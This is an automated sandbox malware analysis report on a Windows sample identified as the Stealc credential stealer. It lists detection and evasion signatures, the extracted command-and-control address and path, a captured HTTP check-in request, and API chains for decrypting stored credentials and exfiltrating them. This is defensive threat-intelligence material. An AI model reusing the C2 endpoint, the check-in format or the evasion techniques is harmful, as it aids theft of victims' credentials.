Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1558871
MD5:b3cec29dfcc248bc4f4f33ff5ba14470
SHA1:389dc1f719b34841eaa55c8e81ce0f773fea3acf
SHA256:841e3ab686e632551e2229d68366490832987ab47d308c54f6817f3e13a5ff52
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B3CEC29DFCC248BC4F4F33FF5BA14470)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1480967160.0000000004DF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6524JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6524JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-19T22:12:15.255016+010020442431Malware Command and Control Activity Detected192.168.2.849706185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.php/rAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php/3Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php/=Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/ctionSettingsLMEM80Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/tVersionAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpMAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php.jAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.6524.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00404C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_004060D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004240B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_004240B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00416960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0040EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00416B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00409B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: O&.Pdb source: file.exe
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00413910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00411250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00411269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0041E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00414B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00414B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0041CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0040DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00412390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0040DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0041DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0041D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004016A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004016B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49706 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 44 38 46 46 32 44 30 31 35 33 32 35 36 34 35 30 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="hwid"5A8D8FF2D0153256450765------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="build"mars------IIEHJKJJJECFHJJJKKEC--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_00406C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKECHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 44 38 46 46 32 44 30 31 35 33 32 35 36 34 35 30 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="hwid"5A8D8FF2D0153256450765------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="build"mars------IIEHJKJJJECFHJJJKKEC--
              Source: file.exe, 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1522326773.0000000001013000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1522326773.000000000101C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1522326773.0000000000FE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1522326773.0000000000FE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.j
              Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/3
              Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/=
              Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/r
              Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpM
              Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ctionSettingsLMEM80
              Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/n
              Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/tVersion
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00409770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007518220_2_00751822
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B98960_2_007B9896
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004248B00_2_004248B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072093B0_2_0072093B
